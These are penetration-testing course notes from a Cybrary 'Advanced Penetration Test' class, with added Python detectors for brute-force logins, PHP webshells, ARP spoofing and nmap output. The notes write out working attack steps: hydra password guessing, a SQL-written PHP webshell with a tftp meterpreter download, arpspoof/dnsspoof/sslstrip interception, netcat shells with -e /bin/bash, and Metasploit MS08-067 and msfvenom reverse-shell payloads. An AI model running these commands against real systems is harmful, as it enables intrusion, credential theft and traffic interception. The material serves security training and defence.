Source: Georgia Weidman on "Advanced Penetration Test"
(1) Crunch
    Tool to bruteforce a keyspace.
    $: crunch 7 7 AB
    Bruteforces all 7-character passwords composed of only the characters A and B.

(2) CeWL
    Tool to map a website and pull potentially interesting words to add to a wordlist.
    $: cewl -w [words].txt -d 1 -m 5 www.[website].com
    -d 1: depth 1
    -m 5: minimum word length is 5 characters

(3) Hydra
    Online password cracking tool.
    $: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3

Offline Password Attacks
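The hydra line above is a single-source online guessing attack against POP3, and that is exactly what the mail server's authentication log makes visible. As an added example (not from the course notes or the author of this page), the following Python reads constructed Dovecot-style pop3-login log lines and raises one alert per source address for either many failures against an account inside a short window (a wordlist attack like the one above) or failures spread across many different usernames (password spraying). The log format, source addresses, usernames and thresholds are all assumptions made for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in Dovecot's pop3-login syslog style; not captured traffic.
# 192.168.20.9 hammers one account, 192.168.20.12 tries a guess across many accounts.
SAMPLE_LOG = """\
Jan 10 09:15:01 mail dovecot: pop3-login: Login: user=<alice>, method=PLAIN, rip=192.168.20.11, lip=192.168.20.10
Jan 10 09:15:03 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<georgia>, method=PLAIN, rip=192.168.20.9, lip=192.168.20.10
Jan 10 09:15:04 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<georgia>, method=PLAIN, rip=192.168.20.9, lip=192.168.20.10
Jan 10 09:15:04 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<georgia>, method=PLAIN, rip=192.168.20.9, lip=192.168.20.10
Jan 10 09:15:05 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<georgia>, method=PLAIN, rip=192.168.20.9, lip=192.168.20.10
Jan 10 09:15:05 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<georgia>, method=PLAIN, rip=192.168.20.9, lip=192.168.20.10
Jan 10 09:15:06 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<georgia>, method=PLAIN, rip=192.168.20.9, lip=192.168.20.10
Jan 10 09:16:10 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<bob>, method=PLAIN, rip=192.168.20.11, lip=192.168.20.10
Jan 10 09:20:00 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<admin>, method=PLAIN, rip=192.168.20.12, lip=192.168.20.10
Jan 10 09:20:01 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<root>, method=PLAIN, rip=192.168.20.12, lip=192.168.20.10
Jan 10 09:20:02 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<test>, method=PLAIN, rip=192.168.20.12, lip=192.168.20.10
Jan 10 09:20:03 mail dovecot: pop3-login: Aborted login (auth failed, 1 attempts in 2 secs): user=<guest>, method=PLAIN, rip=192.168.20.12, lip=192.168.20.10
"""

# Assumed line layout: syslog timestamp, host, "dovecot: pop3-login:", result, user=<...>, rip=<source>
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<result>Login|Aborted login)[^:]*: user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)"
)


def parse_line(line):
    """Return a dict for one pop3-login line, or None if the line is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"),  # year-less syslog stamp
        "ok": m.group("result") == "Login",
        "user": m.group("user"),
        "rip": m.group("rip"),
    }


def detect_bruteforce(lines, window_seconds=60, fail_threshold=5, spray_threshold=4):
    """Sliding-window failure counter per source IP.

    Emits a "bruteforce" alert when one source produces fail_threshold failures
    within window_seconds, and a "spray" alert when its failures inside the
    window touch spray_threshold distinct usernames. One alert per IP per kind.
    """
    recent = defaultdict(deque)  # rip -> deque of (timestamp, user) failures inside the window
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["ok"]:
            continue
        q = recent[ev["rip"]]
        q.append((ev["ts"], ev["user"]))
        while (ev["ts"] - q[0][0]).total_seconds() > window_seconds:
            q.popleft()  # drop failures that aged out of the window
        users = sorted({u for _, u in q})
        for kind, hit in (("bruteforce", len(q) >= fail_threshold),
                          ("spray", len(users) >= spray_threshold)):
            if hit and (ev["rip"], kind) not in alerted:
                alerted.add((ev["rip"], kind))
                alerts.append({"kind": kind, "rip": ev["rip"], "time": ev["ts"].strftime("%H:%M:%S"),
                               "failures": len(q), "users": users})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against the constructed log, it reports 192.168.20.9 for six failures against one account and 192.168.20.12 for spreading four failures over four accounts, while the lone failure from 192.168.20.11 stays below both thresholds. Thresholds are deliberately low for the sample; on a real server tune them to normal mistyped-password rates, and feed the same logic into fail2ban-style blocking or a rate limit on the POP3 service.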
Source: Georgia Weidman on "Advanced Penetration Test"
(1) WebDAV default credentials
    Default -> wampp:xampp
    a. cadaver http://192.168.0.190/webdav
    b. Use msfvenom to create a PHP shell and upload it
    c. Use msfconsole to exploit

(2) Open phpMyAdmin
    a. Create a PHP shell on the Apache server using a SQL query:
       SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"
       http://192.168.0.190/shell.php?cmd=ipconfig
    b. Add a meterpreter PHP file:
       http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

Source: Georgia Weidman on "Advanced Penetration Test"
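The INTO OUTFILE step above leaves a one-line PHP shell under htdocs, which is the artifact a defender can hunt for on the web server. As an added example (not from the course notes or the author of this page), this Python walks a web root and flags PHP files whose source passes request parameters straight into a command-execution or eval call; it builds a constructed sample tree in a temporary directory so it runs offline. The regex patterns, file names and extension list are assumptions made for the example, not a complete webshell signature set.

```python
import os
import re
import tempfile

# Heuristic source patterns of minimal PHP command shells like the one the notes write out.
# Assumed for the example; real webshells are often obfuscated well beyond these.
SHELL_PATTERNS = [
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
     "command execution fed directly from request input"),
    (re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
     "eval of a decoded/obfuscated payload"),
    (re.compile(r"\$_(GET|POST|REQUEST)\s*\[[^\]]+\]\s*\("),
     "variable function call built from request input"),
]

PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php5", ".phar")


def scan_file(path):
    """Return the reason a file looks like a webshell, or None when it is clean or unreadable."""
    try:
        with open(path, "r", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return None
    for pattern, reason in SHELL_PATTERNS:
        if pattern.search(text):
            return reason
    return None


def scan_webroot(root):
    """Walk the web root and return sorted (relative path, reason) pairs for suspicious PHP files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue  # only files the server would execute as PHP
            full = os.path.join(dirpath, name)
            reason = scan_file(full)
            if reason:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, reason))
    return sorted(findings)


def demo():
    """Build a constructed htdocs tree in a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="htdocs_")
    samples = {
        "index.php": "<?php echo 'Hello'; ?>",                         # benign page
        "shell.php": "<?php system($_GET['cmd']); ?>",                  # the one-liner from the notes
        "uploads/x.php": "<?php eval(base64_decode($_POST['p'])); ?>",  # obfuscated variant
        "notes.txt": "system($_GET['cmd'])",                            # not PHP, so ignored
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return scan_webroot(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Treat hits as a starting point for review rather than a verdict, and pair the file scan with the database-side fix: the query above only works because the phpMyAdmin account holds the MySQL FILE privilege and secure_file_priv permits writing into the web root, so removing that privilege and pointing secure_file_priv at a directory the web server does not serve closes the path.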
(1) ARP spoofing
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
    arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
    DNS cache poisoning
    hosts.txt: 192.168.20.9 www.gmail.com
    * Restart arpspoofing between the gateway and the target
    dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)
    Crypto between browser and web server; credentials can't be seen in plaintext.
    SSL man in the middle / SSL stripping:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    Spoof the default gateway with arpspoof
    sslstrip -l 8080

Source: Georgia Weidman, "Advanced Penetration Test" Cybrary
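All three techniques above start from the same move: the target accepts an unsolicited ARP reply that moves the gateway's (or a peer's) IP address onto another MAC, and that change is observable from the LAN. As an added example (not from the course notes or the author of this page), this Python replays a constructed list of ARP reply observations, as a passive sniffer or a periodic ARP-table poller would record them, and alerts when an IP's MAC changes or when one MAC starts answering for several IPs. The MAC addresses, timestamps and the choice of 192.168.20.10 as the protected gateway-side host are assumptions made for the example. The DNS step is detectable in the same spirit: an answer mapping www.gmail.com to a LAN address like 192.168.20.9 disagrees with what a trusted resolver reached over a protected path would return.

```python
import ipaddress
from collections import defaultdict

# Constructed ARP reply observations (time, sender IP, sender MAC); not a real capture.
# 192.168.20.10 is the server/gateway side from the notes, 192.168.20.11 the client, and
# 192.168.20.9 the host that starts answering for both of them.
SAMPLE_ARP_REPLIES = [
    ("09:00:01", "192.168.20.10", "00:11:22:33:44:10"),
    ("09:00:02", "192.168.20.11", "00:11:22:33:44:11"),
    ("09:00:03", "192.168.20.9",  "00:11:22:33:44:09"),
    ("09:05:00", "192.168.20.10", "00:11:22:33:44:09"),  # .10 now resolved to .9's MAC
    ("09:05:00", "192.168.20.11", "00:11:22:33:44:09"),  # .11 too: one MAC answers for three IPs
    ("09:05:01", "192.168.20.10", "00:11:22:33:44:10"),  # the real .10 still answers: mapping flaps
]


def detect_arp_spoofing(replies, protected_ips=frozenset()):
    """Return alerts for IP->MAC changes and for MACs that claim more than one IP.

    protected_ips (typically the default gateway) raise a change to high severity,
    because redirecting the gateway is what an ARP man-in-the-middle needs.
    """
    ip_to_mac = {}                  # last MAC seen answering for each IP
    mac_to_ips = defaultdict(set)   # every IP each MAC has answered for
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({
                "time": ts, "kind": "ip_mac_changed", "ip": ip,
                "old_mac": previous, "new_mac": mac,
                "severity": "high" if ip in protected_ips else "medium",
            })
        ip_to_mac[ip] = mac
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        # alert only when the set of IPs behind this MAC grows past one (no repeats)
        if before >= 1 and len(mac_to_ips[mac]) > before:
            alerts.append({
                "time": ts, "kind": "mac_claims_multiple_ips", "mac": mac,
                "ips": sorted(mac_to_ips[mac], key=ipaddress.ip_address),
                "severity": "high",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES, protected_ips={"192.168.20.10"}):
        print(alert)
```

The flapping entry at the end is the tell-tale of a live attack rather than a legitimate hardware swap: a replaced NIC changes a mapping once, while a spoofer and the real host keep overwriting each other. Static ARP entries for the gateway, dynamic ARP inspection on the switch, and DHCP snooping remove the mapping change the attack relies on.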
Query systems for potential vulnerabilities

(1) Nessus
    Vulnerability database + scanner

(2) Nmap Scripting Engine
    Vulnerability scripts, listed in /usr/share/nmap/scripts on Kali
    nmap -sC 172.16.85.135-136
    nmap --script-help=smb-check-vulns
    nmap --script=nfs-ls 172.16.85.136
    nmap --script=smb-os-discovery 172.16.85.136

(3) Metasploit scanners
    auxiliary/scanner/ftp/anonymous

Web application scanning

(1) Dirbuster
    Graphical tool used for bruteforcing directories and pages.

(2) Nikto
    Vulnerability database of known website issues
    nikto -host http://172.16.85.136

Manual analysis
* Default passwords - WebDAV
* Misconfigured pages - open phpMyAdmin
* Port 3232 on the Windows system - sensitive web server with directory traversal

# Source: Cybrary "Advanced Penetration Test"
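The NSE runs above produce per-port script output that is much easier to triage from nmap's XML (-oX) output than from the screen, especially across many hosts. As an added example (not from the course notes or the author of this page), this Python parses a constructed nmap XML fragment written in the real -oX schema, lists the open ports with their service and script results, and pulls out any script output that declares a VULNERABLE state while ignoring "NOT VULNERABLE". The host, ports, products and script output strings are assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed fragment in nmap's -oX schema; not the output of a real scan.
SAMPLE_NMAP_XML = """\
<nmaprun scanner="nmap" args="nmap -sC -oX - 172.16.85.136">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="172.16.85.136" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="closed" reason="reset"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/>
        <script id="smb-os-discovery" output="OS: Windows XP (Windows 2000 LAN Manager)"/>
      </port>
      <port protocol="tcp" portid="2049"><state state="open" reason="syn-ack"/><service name="nfs"/>
        <script id="nfs-ls" output="NFS Export: /home"/>
      </port>
    </ports>
    <hostscript>
      <script id="smb-check-vulns" output="MS08-067: VULNERABLE"/>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per open port, plus one per host with host-level script results."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "unknown"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry no script output worth keeping
            service = port.find("service")
            results.append({
                "ip": ip,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": service.get("name", "") if service is not None else "",
                "product": service.get("product", "") if service is not None else "",
                "scripts": {s.get("id"): s.get("output", "") for s in port.findall("script")},
            })
        host_scripts = {s.get("id"): s.get("output", "") for s in host.findall("hostscript/script")}
        if host_scripts:
            # host-level scripts (like smb-check-vulns) are not tied to a single port
            results.append({"ip": ip, "port": None, "proto": None, "service": "host",
                            "product": "", "scripts": host_scripts})
    return results


def flag_vulnerable(results):
    """Pick out (ip, port, script id) triples whose output says VULNERABLE but not NOT VULNERABLE."""
    return [
        (r["ip"], r["port"], script_id)
        for r in results
        for script_id, output in r["scripts"].items()
        if re.search(r"(?<!NOT )VULNERABLE", output.upper())
    ]


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    for entry in parsed:
        print(entry["ip"], entry["port"], entry["service"], entry["scripts"])
    print("vulnerable:", flag_vulnerable(parsed))
```

The same parser works on a file produced with `nmap -sC -oX scan.xml <targets>` by reading the file into `parse_nmap_xml`; for a scheduled scan of your own network, diffing the open-port list and the flagged triples against the previous run is a cheap way to notice new exposure.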
* Find as much information as possible about the target.
* What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
    Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
    Example: xamppdirpasswd.txt filetype:txt finds XAMPP passwords

(2) Shodan (Python API)
    Search engine that uses banner grabbing

(3) Whois
    Domain registration records
    root@kali:~# whois ________.com

(4) DNS recon
    root@kali:~# host www.________.com
    root@kali:~# host -t ns ________.com
    root@kali:~# host -t mx ________.com
    * DNS zone transfer
    root@kali:~# host -t ns zoneedit.com
    root@kali:~# host -l zoneedit.com ns2.zoneedit.com
    DNS bruteforce
    root@kali:~# fierce -dns ________.com

(5) Netcraft
    http://searchdns.netcraft.com/

(6) The Harvester
    Automatically searches online for email addresses and the like.
    root@kali:~# theharvester -d ________.com -l 500 -b all

# Notes on Cybrary "Advanced Penetration Test"
Opening a command shell listener:
    root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:
  Redirect output to a file:
    root@kali:~# nc -lvp 1234 > netcatfile
  Send a file from another terminal:
    root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile

Automating tasks with cron jobs:
  Add your task to one of the scheduled directories.
  * For more flexibility, add a line to /etc/crontab.

Source: "Advanced Penetration Testing" Cybrary

I. Ping sweep script:

    #!/bin/bash
    # Pings the C class network and prints only live hosts
    if [ "$1" == "" ]
    then
        echo "Usage: ./pingscript.sh [network]"
        echo "example: ./pingscript.sh 192.168.20"
    else
        for x in $(seq 1 254); do
            # keep only the "64 bytes from a.b.c.d:" reply lines and print the address without its trailing colon
            ping -c 1 "$1.$x" | grep "64 bytes" | cut -d " " -f4 | sed 's/.$//'
        done
    fi

II. Make the script executable:
    $: chmod +x [name of the bash script]

Source: "Advanced Penetration Testing" Cybrary
* Exploitation framework
* Written in Ruby
* Modular: exploits, payloads, auxiliaries, and more

Terminology:
* Exploit: vector for penetrating the system
* Payload: shellcode, what you want the exploit to do after exploitation
* Auxiliary: other exploit modules such as scanning, information gathering
* Session: connection from a successful exploit

Interfaces: msfconsole, msfcli, Armitage
Utilities: msfpayload, msfencode, msfupdate, msfvenom

Exploitation streamlining: traditional vs. Metasploit
  Traditional exploit:
    Find a public exploit
    Replace offsets, return address, etc. for your target
    Replace shellcode
  Metasploit:
    Load a Metasploit module
    Select target
    Select payload

Metasploit payloads:
* Bind shell: opens a port on the victim machine
* Reverse shell: pushes a shell back to the attacker
* Inline: full payload in the exploit
* Staged: shellcode calls back to the attacker to get the rest

Msfcli [command line option]
  O = show options
  P = show payloads
  E = run exploit
  E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/reverse_tcp LHOST=10.0.0.100 E

Msfvenom
  Makes shellcode and stand-alone payloads
  -l list modules
  -f output format
  -p payload to use
  E.g., $: msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe

Multi/handler
* Generic payload handler
* Catches payloads started outside of the framework, for example payloads from msfvenom
  msf> use multi/handler
  $: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe

Source: "Advanced Penetration Testing" Cybrary
#!/usr/bin/env python3
# Single-port TCP connect check (the course's Python 2 script, ported to Python 3)
import socket

ip = input("Enter the ip: ")
port = int(input("Enter the port: "))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)  # don't hang on a filtered port
# connect_ex() returns 0 on success and an errno otherwise, so a non-zero
# result means the port is closed (or filtered, or the host is unreachable)
if s.connect_ex((ip, port)):
    print("Port", port, "is closed")
else:
    print("Port", port, "is open")
s.close()
Author: Vitali Kremez
July 2016